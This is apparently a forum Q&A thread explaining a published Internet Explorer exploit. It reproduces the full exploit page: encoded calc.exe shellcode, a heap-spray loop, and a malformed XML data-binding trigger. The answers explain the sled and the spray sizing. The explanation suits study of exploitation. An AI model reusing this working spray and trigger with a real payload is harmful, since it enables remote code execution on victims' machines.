I usually have no difficulty reading JavaScript code, but I can't figure out the logic of this one. The code is from an exploit that was published 4 days ago. You can find it at milw0rm.
Here is the code:
<html>
<div id='replace'>x</div>
<script>
// windows/exec - 148 bytes
// http://www.metasploit.com
// Encoder: x86/shikata_ga_nai
// EXITFUNC=process, CMD=calc.exe
var shellcode = unescape('%uc92b%u1fb1%u0cbd%uc536%udb9b%ud9c5%u2474%u5af4%uea83%u31fc%u0b6a%u6a03%ud407%u6730%u5cff%u98bb%ud7ff%ua4fe%u9b74%uad05%u8b8b%u028d%ud893%ubccd%u35a2%u37b8%u4290%ua63a%u94e9%u9aa4%ud58d%ue5a3%u1f4c%ueb46%u4b8c%ud0ad%ua844%u524a%u3b81%ub80d%ud748%u4bd4%u6c46%u1392%u734a%u204f%uf86e%udc8e%ua207%u26b4%u04d4%ud084%uecba%u9782%u217c%ue8c0%uca8c%uf4a6%u4721%u0d2e%ua0b0%ucd2c%u00a8%ub05b%u43f4%u24e8%u7a9c%ubb85%u7dcb%ua07d%ued92%u09e1%u9631%u5580');
// ugly heap spray, the d0nkey way!
// works most of the time
var spray = unescape('%u0a0a%u0a0a');
do {
  spray += spray;
} while(spray.length < 0xd0000);
memory = new Array();
for(i = 0; i < 100; i++)
  memory[i] = spray + shellcode;
xmlcode = '<XML ID=I><X><C><![CDATA[<image SRC=http://ਊਊ.example.com>]]></C></X></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML><XML ID=I></XML><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN></SPAN>';
tag = document.getElementById('replace');
tag.innerHTML = xmlcode;
</script>
</html>
Here is what I believe it does; I would like help with the parts I misunderstand.
The variable shellcode contains the code to open calc.exe. I do not get how they found that weird string. Any idea?
The second thing is the variable spray. I do not understand this weird loop.
The third thing is the variable memory, which is never used anywhere. Why do they create it?
Last thing: what does the XML tag do in the page?
So far I have good answers, but mostly very general ones. I would like more explanation of the specific values in the code. An example is unescape('%u0a0a%u0a0a');. What does it mean? Same for the loop: why did the developer write length < 0xd0000? I would like a deeper understanding, not only the theory behind this code.
The shellcode contains some x86 assembly instructions that will do the actual exploit.
spray creates a long sequence of instructions that will be put in memory. Since we usually can't find out the exact location of our shellcode in memory, we put a lot of nop instructions before it and jump to somewhere in there. The memory array will hold the actual x86 code along with the jumping mechanism. It is never read back; it only needs to keep those copies alive on the heap. We'll feed the crafted XML to the library that has the bug. When it's being parsed, the bug will cause the instruction pointer register to be set to somewhere in our exploit, leading to arbitrary code execution.
To understand more deeply, you should actually figure out what is in the x86 code.
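To get a feel for how much memory the spray occupies, the doubling loop from the question can be replayed on lengths alone, without building the real string. This is only a rough sketch: it assumes each string character takes 2 bytes in memory (UTF-16 code units), and it ignores the shellcode's length and any allocator overhead. The names `doublings`, `bytesPerCopy` and `totalBytes` are made up for illustration.

```javascript
// Replay the `do { spray += spray; } while (spray.length < 0xd0000)` loop
// on lengths only, so nothing large is ever allocated.
const seed = unescape('%u0a0a%u0a0a'); // two UTF-16 code units, each 0x0a0a
let length = seed.length;              // starts at 2
let doublings = 0;

do {
  length += length;                    // mirrors `spray += spray`
  doublings++;
} while (length < 0xd0000);            // 0xd0000 === 851968

// Assumption: 2 bytes per character in memory.
const bytesPerCopy = length * 2;
// The for loop in the question stores 100 copies in `memory`.
const totalBytes = bytesPerCopy * 100;

console.log(doublings, length, bytesPerCopy, totalBytes);
// prints: 19 1048576 2097152 209715200
```

Under those assumptions each copy is about 2 MiB and the 100 copies together take roughly 200 MiB, which is why a more or less random address in that range is likely to land inside one of them.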
unescape will be used to put the sequence of bytes represented by the string into the spray variable. It's valid x86 code that fills a large chunk of the heap and runs straight through into the start of the shellcode. The reason for the ending condition is string length limitations of the scripting engine. You can't have strings larger than a specific length.
In x86 assembly,
0a0a represents or cl, [edx]. This is effectively equivalent to a nop instruction for the purposes of our exploit. Wherever we jump to in the spray, we'll keep moving on to the next instruction until we reach the shellcode, which is the code we actually want to execute.
If you look at the XML, you'll see
0x0a0a is there too. Describing exactly what happens requires specific knowledge of the exploit (you have to know where the bug is and how it's exploited, which I don't know). However, it seems that we force Internet Explorer to trigger the buggy code by setting innerHTML to that malicious XML string. Internet Explorer tries to parse it, and the buggy code somehow gives control to a location in memory where the array exists (since it's a large chunk, the probability of jumping there is high). When we jump there, the CPU will keep executing or cl, [edx] instructions until it reaches the beginning of the shellcode that's been put in memory.
I've disassembled the shellcode:
Understanding this shellcode requires knowledge of x86 assembly and of the problem in the MS library itself (to know what the system state is when we reach here), not JavaScript! This code will in turn execute
calc.exe.
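To see which bytes a `%uXXXX` string stands for, each 16-bit unit can be split into its low and high byte. The sketch below assumes the units are stored little-endian, as they are on x86, so the low byte comes first. `toLittleEndianBytes` is a hypothetical helper written for this explanation; it is not part of the exploit or of any library.

```javascript
// Hypothetical helper: list the bytes behind a %uXXXX-escaped string,
// assuming each 16-bit unit is stored low byte first (little-endian).
function toLittleEndianBytes(escaped) {
  const s = unescape(escaped);
  const bytes = [];
  for (let i = 0; i < s.length; i++) {
    const unit = s.charCodeAt(i);      // one 16-bit code unit
    bytes.push(unit & 0xff, unit >> 8); // low byte, then high byte
  }
  return bytes.map(b => b.toString(16).padStart(2, '0')).join(' ');
}

// The spray seed: the same byte repeated, so byte order does not matter.
console.log(toLittleEndianBytes('%u0a0a%u0a0a')); // prints: 0a 0a 0a 0a

// The first two units of the shellcode string from the question.
console.log(toLittleEndianBytes('%uc92b%u1fb1')); // prints: 2b c9 b1 1f
```

The byte list it prints is what you would hand to a disassembler. For the spray seed, every pair `0a 0a` decodes to the or cl, [edx] instruction mentioned above.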